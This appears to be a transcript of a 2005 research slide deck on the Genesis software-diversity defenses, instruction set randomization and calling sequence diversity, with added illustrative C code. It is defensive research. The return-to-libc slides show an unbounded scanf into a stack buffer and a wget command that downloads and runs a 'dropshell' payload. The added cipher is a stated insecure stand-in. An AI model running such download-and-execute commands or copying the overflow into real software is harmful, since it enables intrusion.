GENESIS: A Framework For Achieving Component Diversity
John C. Knight, Jack W. Davidson, David Evans, Anh Nguyen-Tuong (University of Virginia)
Chenxi Wang (Carnegie Mellon University)
University of Virginia www.cs.virginia.edu/genesis
DARPA SRS July 2005 PI Meeting 2
Project Overview
Existing practice: Monoculture
Technical objectives: Exploit artificial diversity to break existing software monoculture
Technical approach: Artificial diversity at compile, link, load, and execution times
  Combinations selectable with toolkit
[Figure: Diversity Transforms applied across the build and execution pipeline. Stages: Compile, Link, Load, Run. Artifacts: Source Code, Object Code, Executable.]
Project Overview
Major risks and planned mitigation:
  Susceptibility to new class of attacks
  Deployment issues
  Ad hoc evaluation
Quantitative metrics:
  Fraction of variants that remain susceptible to attack after transformation
Expected major achievements:
  Significant reduction in susceptibility
Task milestones (schedule 12/31/05):
  Complete diversity toolkit
  Evaluate complete spectrum of diversity techniques
Genesis Diversity Toolkit
[Figure: toolkit overview. A Diversity Specification drives the Genesis Diversity Generator, which produces Application Variants that run in the Genesis Execution Environment on a Server Farm. Generator components: Source Files; Front Ends (lcc, Phoenix, EDG); Diversity Generator; Backend (VPO); Linker (Diablo); RTLs; Object Files; Runtime Libraries; Strata Libraries. Transform labels on the diagram: CSD, SSR, AES/XOR, IT.]
Genesis Diversity Generator
[Figure: generator pipeline. Inputs: Diversity Specification, Source Files, Runtime Libraries, Strata Libraries. Components: Front Ends (lcc, Phoenix, EDG); Diversity Generator; Backend (VPO); Linker (Diablo). Intermediate and final artifacts: RTLs, Object Files, Executable. Transform labels on the diagram: CSD, SSR, AES/XOR, IT.]
Strong ISR using AES and IT
Randomized Instruction Set Emulation, E. G. Barrantes, D. H. Ackley, S. Forrest, and D. Stefanović, ACM Transactions on Information System Security, 8(1), pp. 3-40.
Current implementations of ISR execute injected code
  Random instruction sequences are executed
  Rely on probabilistic arguments that the random sequences will crash harmlessly
  Not realistic for critical embedded systems
  Recovery of application is difficult/impossible
Vulnerable to attack
  Where’s the FEEB?, Ana Sovarel and Dave Evans, USENIX Security Conference, August 2005.
Overhead issues (both space and time)
Strong ISR using AES and IT
F:  inst1
    inst2
    inst3
    bne L1
    inst5
L1: inst6
    ...
Diablo tags and pads instructions
[Figure: byte layout of the fragment at addresses 0x40 to 0x50, shown before and after Diablo tags and pads the instructions; the padded layout contains an added nop.]
Diablo encrypts with AES
[Figure: the same address range, 0x40 to 0x50, after encryption, divided into 128-bit blocks with the tag fields marked.]
Strong ISR using AES and IT
[Figure: link time and run time. Link time: Diablo takes the application binary modules (M1.o, M2.o), the runtime library modules (glibc.a, crt0.o) and a secure key, and produces the Encrypted Application. Run time: the Strata Virtual Machine loop (Context Capture, Cached?, New Fragment, Fetch, Decode, Translate, Next PC, Finished?, Context Switch, New PC) fetches from the Encrypted Application through the Decrypt Engine.]
Decrypt Engine: Decrypt block and check tag. If tag invalid, do not execute fragment.
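The tag, pad, encrypt and check-on-fetch steps from the two preceding slides, as an added example that is not code from the Genesis project. A four-round Feistel network stands in for AES and is not secure; the block layout (12 code bytes plus a 4-byte tag per 128-bit block), the tag value, the key and the sample bytes are assumptions.

```c
#include <stdint.h>
#include <string.h>
#define TAG 0xC0DE5EEDu                      /* constructed tag value (assumption) */
#define NOP 0x90                             /* pad byte */
typedef struct { uint64_t l, r; } block_t;   /* one 128-bit block */
static const uint64_t KEY[4] = { 0x0123456789abcdefull, 0xfedcba9876543210ull,
                                 0x0f1e2d3c4b5a6978ull, 0x8796a5b4c3d2e1f0ull };
/* Stand-in cipher, NOT AES and not secure: a 4-round Feistel network. */
static uint64_t f(uint64_t x, uint64_t k) {
    x = (x ^ k) * 0x9E3779B97F4A7C15ull;
    return x ^ (x >> 29);
}
static block_t encrypt(block_t b) {
    for (int i = 0; i < 4; i++) { uint64_t t = b.l ^ f(b.r, KEY[i]); b.l = b.r; b.r = t; }
    return b;
}
static block_t decrypt(block_t b) {
    for (int i = 3; i >= 0; i--) { uint64_t t = b.r ^ f(b.l, KEY[i]); b.r = b.l; b.l = t; }
    return b;
}
/* Link time: pad up to 12 code bytes with nops, append the tag, encrypt. */
block_t seal(const uint8_t *code, size_t n) {
    uint8_t raw[16]; uint32_t tag = TAG; block_t b;
    memset(raw, NOP, 12);
    memcpy(raw, code, n > 12 ? 12 : n);
    memcpy(raw + 12, &tag, 4);
    memcpy(&b, raw, 16);
    return encrypt(b);
}
/* Run time: decrypt the block; release the code bytes only if the tag matches. */
int fetch(block_t in, uint8_t out[12]) {
    uint8_t raw[16]; uint32_t tag;
    block_t b = decrypt(in);
    memcpy(raw, &b, 16);
    memcpy(&tag, raw + 12, 4);
    if (tag != TAG) return 0;                /* invalid tag: do not execute fragment */
    memcpy(out, raw, 12);
    return 1;
}
/* Returns 1 if a block of `fill` bytes that was never sealed is accepted. */
int fetch_unsealed(uint8_t fill) {
    block_t b; uint8_t out[12];
    memset(&b, fill, sizeof b);
    return fetch(b, out);
}
int main(void) {
    uint8_t out[12], code[5] = { 0x55, 0x89, 0xe5, 0x5d, 0xc3 };   /* constructed bytes */
    return !(fetch(seal(code, 5), out) == 1 && fetch_unsealed(0x41) == 0);
}
```

With a 4-byte tag, bytes that were not sealed under the key pass the check with probability about 2^-32, so they are rejected before translation instead of being executed as random instructions.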
CSD: Calling sequence diversity
Compile-time/runtime technique to create a software population with many different calling sequences
Effective defense against “return-to-libc” attacks (also known as arc injection, Pincus and Baker, IEEE Security and Privacy, 2(4), pp. 20-27)
  Return-to-libc does not require injecting code into the application
  ISR is not an effective defense against return-to-libc type attacks
Return-to-libc attack
void bar(int arg1, int arg2) {
    char buffer[100];
    …
    scanf("%s", buffer);   /* unbounded read into a 100-byte stack buffer */
    …
}
[Figure: runtime stack before the overflow (…, arg2, arg1, return addr, saved ebp, buffer) and after the buffer overflow (…, arg2, bad arg, system, saved ebp, buffer).]
wget: http://www.example.com/dropshell ;chmod +x dropshell ; ./dropshell
CSD: Calling sequence diversity
void bar() {
    …
    key = Keygen(key, &bar, &foo);
    foo(arg1, arg2);
    key = Keygen(key, &foo, &bar);
    …
    key = Keygen(key, &bar, &baz);
    baz(arg);
    key = Keygen(key, &baz, &bar);
    …
}
void foo(int a1, int a2) {
    Keycheck(key);
    …
    Keycheck(key);
}
CSD: Calling sequence diversity
Calls to Keygen and Keycheck routines are inserted by the compiler front end (lcc, EDG, Phoenix)
At runtime:
  Strata generates a key for each function (stored in protected region)
  Replaces calls with inline code to generate proper key or check that the key has the proper value
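A runnable sketch of the Keygen/Keycheck instrumentation, added here as an example and not taken from the Genesis toolkit. The slides do not define either routine: the XOR key exchange, the function indices used in place of the function addresses, the extra Keycheck argument and the key constants are all assumptions.

```c
#include <stdint.h>
#include <stdio.h>

enum { FN_BAR, FN_FOO, FN_COUNT };

/* Per-function keys: constructed constants. On the slides Strata generates
   them at run time and stores them in a protected region. */
static const uint32_t fn_key[FN_COUNT] = { 0x5bd1e995u, 0x27d4eb2fu };
static uint32_t key;        /* running key carried across calls */
static int violations;      /* failed Keycheck calls */

/* Assumed Keygen: exchange the caller's key for the callee's. */
static uint32_t Keygen(uint32_t k, int from, int to) {
    return k ^ fn_key[from] ^ fn_key[to];
}
/* Assumed Keycheck: the key must be the one of the function now running. */
static int Keycheck(uint32_t k, int self) {
    if (k == fn_key[self]) return 1;
    violations++;
    return 0;
}
static int foo(int a1, int a2) {
    if (!Keycheck(key, FN_FOO)) return -1;   /* wrong calling sequence: stop */
    return a1 + a2;
}
/* Call site as instrumented on the slide: Keygen before and after the call. */
int call_with_sequence(int a1, int a2) {
    key = fn_key[FN_BAR];
    key = Keygen(key, FN_BAR, FN_FOO);
    int r = foo(a1, a2);
    key = Keygen(key, FN_FOO, FN_BAR);
    return r;
}
/* Transfer into foo that never ran Keygen, standing in for an overwritten
   return address; nothing is exploited here. */
int call_without_sequence(int a1, int a2) {
    key = fn_key[FN_BAR];
    return foo(a1, a2);
}
int violation_count(void) { return violations; }

int main(void) {
    printf("%d\n", call_with_sequence(2, 3));      /* 5 */
    printf("%d\n", call_without_sequence(2, 3));   /* -1 */
    printf("%d\n", violation_count());             /* 1 */
    return 0;
}
```

Because each variant gets different per-function keys, a control transfer that works against one variant's calling sequence fails the check in the others.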
Return-to-libc attack
void bad(int arg1, int arg2) {
    char buffer[100];
    …
    scanf("%s", buffer);   /* unbounded read into a 100-byte stack buffer */
    …
}
[Figure: runtime stack before the overflow (…, arg2, arg1, return addr, saved ebp, buffer) and after the buffer overflow (…, arg2, bad arg, system, saved ebp, buffer).]
wget: http://www.example.com/dropshell ;chmod +x dropshell ; ./dropshell
Genesis Diversity Toolkit
[Figure: toolkit overview diagram, with the same components as the earlier Genesis Diversity Toolkit slide: Diversity Specification, Genesis Diversity Generator, Application Variants, Genesis Execution Environment, Server Farm.]
Toolkit Execution Environment
[Figure: Diversity Specification; Application Variants from Diversity Generator; Genesis Execution Environment; Server Farm.]
Performance
Apache Performance (w/fast returns, w/IBTC)
[Figure: bar chart. Y-axis: Slowdown, 0 to 1.4. X-axis: Configuration. Series: No Checking, Checking. Configurations are labelled in the form csd=0.prefix=0.aes=0.xor=0.ssr=0 and cover csd in {0, 1}, prefix in {0, 1}, one of aes=1, xor=1 or neither, and ssr in {0, 64}, plus a "no strata" baseline. Bar values are not recoverable from the transcript.]
Progress Towards Metric
Diversity toolkit facilitates:
  Creation of large number of variants
  Operating, attacking & monitoring variants
Large numbers of variants of Apache created and tested, success rate very high
Disclaimers:
  Only one application
  Synthetic but realistic vulnerabilities
  No statistical significance